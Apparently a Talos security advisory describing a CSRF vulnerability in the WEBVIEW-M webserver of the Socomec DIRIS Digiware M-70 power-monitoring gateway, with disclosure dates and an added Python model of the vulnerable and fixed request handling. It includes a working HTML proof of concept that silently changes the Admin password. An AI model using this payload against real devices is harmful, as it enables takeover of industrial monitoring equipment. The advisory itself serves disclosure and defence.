A cross-site request forgery (CSRF) vulnerability exists in the WEBVIEW-M functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious webpage to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Socomec DIRIS Digiware M-70 1.6.9
DIRIS Digiware M-70 - https://www.socomec.us/en-us/reference/48290222
7.5 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-352 - Cross-Site Request Forgery (CSRF)
The DIRIS Digiware M-50/M-70 gateway functions as the access point for industrial power monitoring systems, providing power supply and communication connection to devices in the electrical installation. It also includes a webserver WEBVIEW-M for the remote visualisation and analysis of measurements and consumption.
The Socomec M-70 webserver, WEBVIEW-M, uses cookies to manage user sessions. The session cookie has the SameSite attribute set to Strict, which instructs the browser not to send the cookie with any cross-site request. On its own this is often a sufficient CSRF prevention measure. However, the WEBVIEW-M implementation does not properly handle a request that arrives with no session cookie at all. If a victim visits a malicious web page while logged in to WEBVIEW-M, the browser behaves correctly: because the SameSite attribute is Strict, it does not transmit the sessionid cookie with the cross-site request. The forged request is nevertheless sent over the existing TCP connection that has already been authenticated, and the WEBVIEW-M webserver processes and executes it as if it were authorized, even though no valid sessionid cookie is included. The result is a successful cross-site request forgery attack.
<html>
  <body>
    <form id="csrf-form" action="http://192.168.0.4/Authenticate/?ModifyAccount" method="POST">
      <input type="hidden" name="REQUEST_ID" value="1">
      <input type="hidden" name="DEVICE_ID" value="0">
      <input type="hidden" name="USERNAME" value="Admin">
      <input type="hidden" name="OLD_PASSWORD" value="">
      <input type="hidden" name="NEW_PASSWORD" value="CSRFAdmin1!">
      <input type="submit" value="Submit">
    </form>
    <script>
      // Automatically submit the form when the page loads
      window.onload = function() {
        document.getElementById('csrf-form').submit();
      };
    </script>
  </body>
</html>
If the victim, logged in as the Cyber Security user of WEBVIEW-M, visits the above HTML page from the same browser, the Admin user's password is changed to CSRFAdmin1!, allowing the attacker to gain the privileges of the Admin user.
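The server-side defect described above, modelled as an added example (this is not Socomec's code and makes no claim about how WEBVIEW-M is implemented internally): a keep-alive handler that remembers "logged in" on the TCP connection accepts a later cookie-less request on that connection, whereas a handler that authorizes each request only from its own session cookie, and rejects state-changing requests whose Origin is not the site's own, refuses it. The session store, session id and attacker origin are constructed sample values; the gateway origin and endpoint path are taken from the PoC above.

```python
from dataclasses import dataclass, field
from typing import Optional

VALID_SESSIONS = {"abc123": "Admin"}   # constructed sample session store
SITE_ORIGIN = "http://192.168.0.4"     # gateway origin from the PoC above


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


@dataclass
class Connection:
    """Per-TCP-connection state kept by a keep-alive webserver."""
    authenticated_user: Optional[str] = None


def vulnerable_handle(conn: Connection, req: Request) -> str:
    # Defect: authorization is cached on the connection, so a later request
    # on the same connection is accepted even when it carries no cookie.
    user = VALID_SESSIONS.get(req.cookies.get("sessionid"))
    if user:
        conn.authenticated_user = user
    if conn.authenticated_user is None:
        return "401 Unauthorized"
    return f"200 OK: {req.path} executed as {conn.authenticated_user}"


def fixed_handle(conn: Connection, req: Request) -> str:
    # Fix: every request must present a valid session cookie itself, and a
    # state-changing request must originate from the site's own origin.
    user = VALID_SESSIONS.get(req.cookies.get("sessionid"))
    if user is None:
        return "401 Unauthorized"
    if req.method == "POST" and req.headers.get("Origin") != SITE_ORIGIN:
        return "403 Forbidden: cross-site request rejected"
    return f"200 OK: {req.path} executed as {user}"


def simulate(handler):
    """Replay the scenario on one keep-alive connection: the victim's own
    authenticated request, then the forged cross-site POST the browser sends
    without the SameSite=Strict cookie. Returns both responses."""
    conn = Connection()
    path = "/Authenticate/?ModifyAccount"
    own = Request("POST", path, {"sessionid": "abc123"}, {"Origin": SITE_ORIGIN})
    forged = Request("POST", path, {}, {"Origin": "http://attacker.example"})
    return handler(conn, own), handler(conn, forged)
```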
Vendor advisory: https://www.socomec.fr/sites/default/files/2025-10/CVE-2024-53684—Diris-Digiware-Mxx-Dxx-_VULNERABILITIES_2025-10-01-16-43-14_English_0.pdf
2025-01-13 - Vendor Disclosure
2025-10-01 - Vendor Patch Release
2025-12-01 - Public Release
Discovered by Kelly Patterson of Cisco Talos.